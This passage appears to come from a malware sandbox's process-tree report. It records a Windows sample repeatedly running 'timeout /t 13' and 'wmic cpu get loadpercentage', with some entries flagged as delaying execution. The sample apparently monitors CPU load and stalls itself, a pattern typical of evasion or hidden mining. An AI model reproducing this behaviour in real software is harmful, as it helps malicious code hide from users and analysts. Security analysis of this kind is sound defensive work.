C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1284
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3812
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1276
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1216
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2960
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4208
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2848
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4440
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4332
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1592
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:660
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3164
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1304
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4632
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2292
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3408
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1884
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:168
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3548
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2156
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3948
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3524
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4956
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3396
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4916
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5012
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4336
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2364
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4768
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2456
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2036
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3512
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1352
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4196
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4832
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3028
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2428
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2868
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4536
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2372
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2224
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3876
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:832
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:408
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1804
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1232
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3052
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1200
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:524
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2384
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:920
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5076
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5032
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4644
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1604
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:760
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4412
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4228
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1100
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4276
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:348
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:988
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4796
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1712
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:372
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3324
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2376
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4160
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2556
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:4280
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4420
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2404
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3672
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2840
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4968
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1852
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4912
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1872
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3012
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1260
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1284
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2688
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2972
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:876
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1156
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4248
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2136
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1600
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4244
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3960
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:192
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3676
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1304
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:208
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3544
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:200
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3448
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3548
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:4084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3392
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3524
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2420
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2528
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4028
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4376
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:508
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3384
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1280
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3400
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4400
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3228
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2884
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4680
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:528
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5108
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3372
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2692
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3508
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5020
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1056
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1964
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5112
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3044
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:4224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4752
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4436
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:524
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4504
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3972
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5004
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2520
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:4964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2212
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:760
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3348
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1380
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:988
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2192
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4772
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1712
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2752
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3224
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2424
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4192
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4160
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2144
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2916
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4420
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4968
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:224
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:404
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1772
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2416
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:60
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1260
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2828
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2160
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2688
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3344
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:876
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4440
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1600
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3680
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4236
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:660
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4244
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:2832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:864
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1304
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:1884
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3688
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3408
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1312
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4480
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4340
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1448
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3396
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2528
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4240
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5096
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4376
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4628
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1280
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3980
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3928
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4636
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3228
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2488
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2660
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1376
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4556
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4500
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4004
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2228
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4512
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4272
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5112
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3100
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4752
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4124
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2384
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3972
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4644
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2648
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5016
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1220
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3468
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5036
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4276
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2860
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2632
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3436
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4664
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:440
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5052
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3464
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3160
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1476
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1544
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:240
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3672
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:2916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3368
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1852
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1384
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:404
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2484
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1772
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:60
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2804
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2936
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1940
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4048
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4248
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4440
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1636
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4576
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:432
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:660
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2832
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4960
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5048
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2156
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3992
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1512
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3948
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4348
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3524
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3568
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4112
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
